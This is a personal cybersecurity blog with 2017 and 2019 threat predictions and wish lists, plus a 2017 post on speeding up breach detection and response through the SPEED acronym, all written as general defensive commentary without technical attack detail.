Sunday, December 30, 2018

Cybersecurity Predictions and a Wish List for 2019

© 2018 Bob Carver, CISM, CISSP, M.S.
As in recent times, the cyber threats will continue to get worse before they get better.  Those that think “good enough” security or risk management will be sorely disappointed in the large gaps they will leave open for the cybercriminals and nation-state actors to easily breach and compromise their enterprise.
© 2018 Bob Carver, CISM, CISSP, M.S.
As in recent times, the cyber threats will continue to get worse before they get better.  Those that think “good enough” security or risk management will be sorely disappointed in the large gaps they will leave open for the cybercriminals and nation-state actors to easily breach and compromise their enterprise.
  • Cybercrime as a Service (CaaS) will continue to increase. There is no need to be a malware/exploit writer yourself if you can simply buy or rent. It is much easier to set up a cybercrime business than it is to open a corner store in your neighborhood. Just open an appropriate cryptocurrency account and make your payment to your cybercrime vendor of choice. Their customer support and malware/exploit guarantees will rival, if not beat, the best premium, legitimate software vendors.
  • We will continue to see increased manipulation of standard processes and utilities to compromise, manipulate and exfiltrate data. This includes escalating privileges to utilize those processes that are often whitelisted in most endpoint security systems. It will all look legitimate to the average user/endpoint security but it will be malicious.
  • We will start seeing more machine learning malware that plays games with machine learning endpoint and intrusion detection algorithms to avoid detection. This will result in “My machine learning is better than your machine learning.” You can guess who will often win.
  • Intrusion detection systems will have continued decreased visibility in data flows and malicious activity due to encryption. Gartner has already predicted that in 2019, 80% of all traffic will be encrypted and 70% of malicious traffic will be encrypted. Will we be ready to detect what is happening in those malicious obfuscated traffic flows?
  • IoT (Internet of Things) wreaking security havoc is not going away. Consumer routers, webcams, security cameras and other Internet connected consumer goods continue to have poor or marginal security. I predicted in 2016 these problems would arise even before Mirai, Hide ‘n Seek, Gafgyt and the like. Unless people, organizations and manufacturers are held to some level of responsibility, we will have more of the same.
  • Insurance Policies may be less likely to pay cyber insurance claims. Of course they want and need to be profitable. There are multiple areas in your cybersecurity policy you might want to review with a fine tooth comb. Recently one insurance company denied claims related to Not Petya infections, claiming they were an Act of War or Force Majeure. Additional clarifications and negotiations probably need to take place in that area. Next verify you have the people, processes and technology in place that are required by your policy and then check the fine print for exclusions.
  • One or more businesses may have to claim bankruptcy or cease to exist (at least in their current form) due to overwhelming expenses that are required as a result of a major breach.
  • The autonomous machine learning bots are coming. At least one or more Proof of Concepts have been tested and refined. This means that little or no traditional command and control (North-South Internet) traffic is needed to execute reconnaissance, exploitation and complete exfiltration; or worse yet, destroy or manipulate data. No more telltale beaming of C2 traffic. Monitoring of files, processes whether on disk or memory and visibility into East-West traffic will be necessary now more than ever.
  • Security Scores for companies are a work in progess. Just like FICO or credit scores have been in place for decades in an attempt to measure credit risk, security scores will eventually be utilized for third party risk, supply chain risk, mergers and acquisitions, overall corporate risk and pricing models for cyber insurance. 
  • “Good enough security” will eventually be seen for what it really is “Not Good Enough.” Underestimating your adversary will eventually be seen as naive and “penny pinching will be exposed as pound foolish.” Third-party partner risk, mergers and acquisitions and insurance underwriting will eventually be affected by the business entity’s perceived or actual risk. Due to this additional clarity of risk, those that are deemed a higher risk may be forced to pay for that risk.
  • Firmware/hardware and side channel attacks will happen at nation state and high- end cybercriminal level. This will put more pressure on designing a better Zero Trust TPM (Trusted Platform Model.) Unfortunately with current hardware and operating systems, these attacks may be relatively invisible.
  • New record fines will be assessed for breaches related to GDPR.
  • Some major supply chains and/or third party corporate partners will be breached and will wreak havoc for all the entities that are interconnected or interdependent. This may create a new demand in cyber specialists to specifically focus on supply chain and third-party cyber-risk management.
  • Threat Hunting - in large corporations should be a top priority since many threats are simply not seen in on endpoint and intrusion detection systems. Not just searching for known documented threats, but searching for the unknown. Complete logs, processes, changes and data flows (North-South and East-West) are needed. Ideally, those data flows should be correlated to a process on the endpoint whether on disk or memory.
Wish List
  • Secure our voting systems and back all votes with paper ballots. Anyone, regardless of party, living in a real democracy should want a voting system that cannot easily be rigged to change votes for the candidate that has access to the vulnerable voting machines. BlackHat Las Vegas this year displayed a 12 year old breaking in and changing votes on a current voting machine. Known possible manipulation is often not investigated and swept under the rug.  In the meantime, while we are re-inventing a more secure system, we need to stop handing over the source code of these voting machines to foreign entities that may want to manipulate the end results of our elections.
  • Make into law who is going to be responsible for the security of IoT and will be required to take appropriate action when things go wrong. At present no one is taking responsibility. There needs to be a delineation of responsibility between the following:
- The owner of IoT
- The manufacturer
- The ISP
- The government
  • The Boardroom needs to increase their knowledge and involvement in overseeing risk management in cybersecurity and cyber resilience. A static check box mentality doesn’t work in this extremely dynamic attack environment.  Dynamic analysis through frameworks such as NIST CSF needs to be utilized. The attributes of quality in NIST CSF are not easily translated into a consistent quantifiable model that can be utilized for benchmarking. It will not be easy to come to an agreement on a consistent way to measure across institutions, industries or market verticals as well as the size of the business. Essentially “one size” does not fit all. Risk optimization is closer to the process of getting fit for a custom-tailored suit than reporting a series of standardized checkboxes with weighted ratings.
2019 and beyond will no doubt be interesting for all of us, stretching those that will be attempting to adapt to this increasingly dynamic threat environment and may be harsh for those that are settling for “good enough” security.

Thursday, July 20, 2017



Enjoy the heart pumping speed of the racing video above or go directly to the article below:

Cybersecurity: The Need for SPEED


If you look at a range of recent security industry reports, you’ll see varying times quoted for how long it takes criminals and bad actors to exploit your network and exfiltrate data, and how long it takes to discover and remediate a breach. On average, though, the numbers look something like this:
  • Time to compromise would take minutes, if not seconds.
  • Time to exfiltrate data, days if not weeks.
  • Time to discover or identify the breach often takes months if not years.
Of course, there are a lot of factors that impact these times, including the maturity of the organization, employee education programs (or lack thereof), headcount, and the people, processes, and technology you have in place.
It can also depend on how quickly response teams work together when an incident occurs. As pointed out in the 2017 annual “Cost of a Data Breach Study,” rapid response drives down the cost of a data breach. According to this report, “Failure to quickly identify the data breach increases costs. If the MTTI (Mean Time to Identify) breach was less than 100 days, the total cost was $2.8 million. If it was over 100 days, the estimated cost was $3.83 million.”
It’s clear that when it comes to security, time is of the essence. To help you prioritize, here’s a handy acronym you can share with your teams when it comes to your cyber security initiatives:
S – Situational Awareness
P – Patching (Cyber Hygiene)
E – Evolve Continuously
E – Event Monitoring
D – Detection

Situational Awareness

What is situational awareness?  One source defines it as “[…] the perception of an enterprise’s security posture and its threat environment; the comprehension/meaning of both taken together (risk); and the projection of their status into the near future.”
Some of the questions you need to answer to determine your situational awareness include:
  • Do you know where and what your vulnerabilities are in your people and processes? Do you have a plan to mitigate them? Does that plan include timelines or training?
  • Have you conducted penetration testing to detect weak points in your network? Do you have a plan to address any issues found?
  • If compromised, do you have a plan in place to address it quickly? When was the last time that plan was reviewed or tested?
  • Are your cyber security teams and your business continuity or disaster recovery teams tied at the hip?

Patching (Cyber Hygiene)

While zero-day vulnerabilities often make headlines, malicious hackers more commonly exploit vulnerabilities that have already been revealed. For example, many businesses (including a Honda manufacturing plant and some hospitals) had their operations interrupted by the WannaCry ransomware exploit, because they didn’t patch known vulnerabilities quickly enough. Running patch updates monthly won’t cut it. Desktops should be updated as soon as patches are released as your first line of defense. Server patches may take a bit longer, as they may require time for testing to verify that functionality isn’t affected. In the case of operating systems that are no longer supported, like older versions of Windows, users must be migrated to newer ones that are, or a plan developed to migrate them if an immediate move isn’t practical.

Evolve Continuously

Your people, processes, and technology must constantly evolve. You don’t want to be one of those organizations that gets notified of a compromise by law enforcement before your security teams are aware of the situation.
Here are some important questions to consider in measuring your security maturity:
  • Are your people studying, getting education, and keeping up with current events and technology advancements?
  • Are your processes still valid? Do they need to be updated or modified?
  • When is the last time your systems were updated or upgraded?
  • Do you know if your current antivirus software can detect or mitigate exploits that run in memory? Is it time for an RFP for a new endpoint security product?

Event Monitoring

Continuous monitoring of events is a key factor of being able to discover a breach and react quickly.
Key questions you should consider include:
  • Can you easily detect malicious traffic?
  • Can you quickly identify endpoint changes?
  • Are you able to recognize if these changes are malicious or benign?
  • If the changes are malicious, is Endpoint Data Remediation (EDR) available or do you need to reimage the device?
  • Are you monitoring external traffic from your network to and from the Internet (C2 traffic) for malware and potential indicators of compromise?
  • Are you monitoring internal traffic? What potential malicious communication has taken place from one endpoint to another?
  • Are you monitoring your cloud applications, as well as devices and endpoints outside the company network?

Detection

As we saw earlier in the Ponemon study, the faster that a data breach is detected, the more you can reduce costs and business impact. If you factor in the hours spared by your security team, as well as legal, public relations, operations, and other parts of the organization, the savings add up quickly. That time can be better spent growing your business and improving operations. By detecting breaches earlier, you can also better protect your brand reputation and maintain customer loyalty.

Summary

With an estimated 1.38 billion records of data reported stolen in 2016 approximately 43 records per second – putting the need for speed model into place can lead to a more mature security program that helps you save time and money over the long run.
Bob Carver made Klout’s Top 10 list of most recommended influencers to follow in #CyberSecurity and #infosec. You can follow him on Twitter: @cybersecboardrm. 

LinkedIn has announced he is Top 5 Cybersecurity Influencers to follow on the platform.
Copyright © 2017 Bob Carver CISM, CISSP, M.S.


Tuesday, January 10, 2017

Eleven Cybersecurity Predictions and a Wish List for 2017

Copyright © 2016 Bob Carver CISM, CISSP, M.S.

Let's start with some of things I got right in 2016:

IoT - This was #1 on my list for 2016 Predictions last year. The beginning of IoT security problems have been seen and felt this year. The Mirai botnet took down 85 websites for a good part of the day in various parts of the U.S., parts of the UK and the EU.  These botnets also took two well known websites offline for a large part of a day. Various reports of Internet interruption have been reported all over the world due to IoT botnet activity.
Signature based AV and IDS - continues to be worth less in all computing environments and unable to detect the vast majority of sophisticated malware.
Automation - is starting to be seen in several areas of information security; however, it has a way to go to fully integrate into monitoring, forensics and the incident response process.
Received a wish from last year's wish list:
UL-like certification - for security of various IoT or things that connect to the Internet. There are several organizations attempting to do this now.  If I was a betting man, I would put my money on Mudge Zatko’s project to have some of the best success.

Predictions 2017:

1. More issues with the IoT (Internet of Things) – Although the U.S. Congress was shocked at a recent hearing of the power of hijacked IoT, it still does not want to legislate IoT, the majority of users don’t know how to secure IoT and vendors/resellers may not be under any legal threat to take any action to better their products. This means more mischief or worse will take place in the coming year. If no one is held responsible, the malware writers and botnet herders will play (“wreak havoc”).
The Mirai botnet was just the tip of the iceberg. It was a relative unsophisticated test just to see what can be accomplished. Just as we can only see the tip of an iceberg, the majority of the iceberg is submerged below water and has yet to be seen.
While we are on the subject of IoT, let’s put ICS (Industrial Control Systems), IIoT (Industrial Internet of Things) in this same risk bucket. Many of these devices can be hijacked similarly to IoT and cause major hurt for all networks and users involved.
The ICS and IIoT users/manufacturers have generally been more serious on securing their platforms in recent times; however, there are laggards and legacy systems that are still in need of shoring up their security.
The question still remains when and who will ultimately take responsibility for this mess?
2. Advanced Endpoint Security – If you haven’t purchased Advanced Endpoint Security yet, this is the year everyone should have an RFP out to upgrade their endpoint protection. All traditional AV is evaded with malware that has any level of sophistication. Cybercriminals are selling malware with guarantees that their malware will not be detected by any traditional AV.
3. Compliance to Insurance Standards vs. Compliance to traditional Cybersecurity Standards (NIST, ISO and the list goes on) – In the near future, your Cybersecurity Insurance provider will have the larger influence on what type of security defenses, detection, mitigation, people, processes and technology you will need to have in place. If you don’t follow their recommendations/guidelines, you either won’t be able to obtain insurance or your premiums and deductibles will be so high that it will most likely force you to abide. Note currently insurance companies can only assess relative risk by the industry a business is in. The statisticians/actuaries will be working night and day to be able to assess risk factor down to a much more granular level than categorizing the industry a business is in. Their job will not be easy since the risk factors can be extremely dynamic in nature.
4. Traditional IOC (Indicators of Compromise) MD5/SHA256 hashes of malware, IP addresses, URLs or domain names of botnet command and control servers may become less important. Why? Hashes can change with minor modifications of code making an almost infinite number of variants. URL’s and domains can change daily, hourly or even by the minute. By the time all IOC’s have been vetted and published, the game has changed and the last IOC’s merely point to past historical data.  If they are to be of any value, the dwell time will make it necessary to vet and publish these IOC’s in as close to "real-time" as possible.
Of course, knowing IOC’s in advance, like cracking DNG (Domain Name Generation) algorithms is also useful.
As a result, we need to focus more weight on TTP’s (Tactics, Techniques and Procedures) used in cyberattacks and how we will immediately recognize or block those attacks.
5. Malware, where is the malware?  
Yes, Kaspersky estimates there are 323,000 pieces of new malware each day while Virustotal recently saw 413,720 pieces of new malware in a day. So why do I say where is the malware?
Fileless malware, Exploit Kits, memory resident malware and legitimate operating system processes will continue to increase and be responsible for a larger portion of malicious cybersecurity activity. Hijacked legitimate processes or simply using legitimate user credentials will make it more difficult to determine whether a legitimate process is used for good or malicious activities. Note most traditional Antivirus have these processes whitelisted, indicating they can only be used for good, legitimate work. Unfortunately, the cybercriminals have discovered that good legitimate tools can also be used for nefarious purposes.
6. Banking/Financial Sector – The famous question to a bank robber was, "Why do you rob banks?" The answer, “Because that is where the money is.” Various cybercrime schemes in the financial industry have been started by testing in the East and gradually moving their exploits to the West and most likely will not be slowing down any time in the near future.
Traditionally the goal for cybercriminals was simply to move cash from banks to their own accounts. New exploits to make money are being coded and executed every day.
Some recent trends that are bound to evolve and get more creative over time:
  • ATM’s - exploit one ATM and be able to empty the entire network of ATM’s. 
  • Mobile banking apps – the mobile or app is compromised and the account is taken over by the cybercriminal.
  • One European bank that was often used to hide money from tax collectors was breached and its clients were blackmailed to ensure their tax evading plans were not revealed to the authorities.
  • Risk of malicious manipulation of ledgers and databases. 
If you can imagine a reasonable scenario, most likely it will be attempted.
7. The Cloud – The cloud is already one of the favorite methods for distributing malware. Enterprises are still honing their abilities to monitor, scan for vulnerabilities, lock down and protect the cloud. When cybercriminals take advantage of the cloud, then the enterprise will truly know their weaknesses, continuing to refine their monitoring, hardening and security practices.
8. Ransomware – will continue to grow; however, it may not be the traditional "encrypt your computer and demand bitcoin" to give you the decryption key. Cybercriminals will be concocting new business models and new platforms to execute them. Encryption is becoming old school. Data destruction, data manipulation, being locked out of digital platforms and old-fashioned blackmail could be some of those new criminal activities. It may go into the cloud, automobiles, IoT/IIot/ICS and beyond.
9. Mobile – in spite of unending patches and upgrades the smartphone still is one of the most vulnerable platforms.  There has been progress; however, if the sophisticated actor wants to compromise your emails, texts, contacts or banking apps, they most likely will gain access. Blackberry was the king of secure phones for the longest time. Unfortunately, they did not keep up with consumer demands for modern, convenient apps and browsing the Internet. Let’s hope security is better embedded by design in the phones the general public purchases getting back to the level of security Blackberry was known for. Look for financial exploits and access to personal information.
10. Terrorists and Rogue Nations - will utilize traditional cybercriminal activities to raise money for their cause.  They have been losing ground in their land grabs. This may cause some of them to go virtual and get behind the keyboard.
11. Phishing and Social Engineering – Simply said, it is not going away. This is still one of the most popular ways that a perpetrator gains the initial foothold in a network. As long as they get a regular, small percentage return on their continued attempts, it is not going away. In the meantime defenders need to continue to raise the bar in their detection algorithms, possibly utilizing machine learning, because the cybercriminals will continue to raise the bar with their exploits.
Wishes for 2017, the New Year:
1. That everyone understands there is no more "set it and forget it" security programs that are sufficient to protect you. You must be dynamic to keep up with the attackers.
2. That some group ultimately takes responsibility for IoT/ICS security matters.
3. Threat platforms progress to make IOC’s available as close to real-time as possible. That TTP’s become more important in Threat Intelligence and be made available more quickly.
4. That more IoT/IIoT/ICS be purchased that includes a warranty to support security patches for at least 5 years (or more) and forces users to change passwords (and ideally usernames) at initial login to the device.
5. Expiration dates on IoT/IIoT/ICS. If these devices have serious security flaws that can no longer be remediated, they should be forced to have an "end of life" date where they would be retired and taken out of service.
Remember, being compliant does not mean you are secure.
Everyone be vigilant and have a safe, great 2017!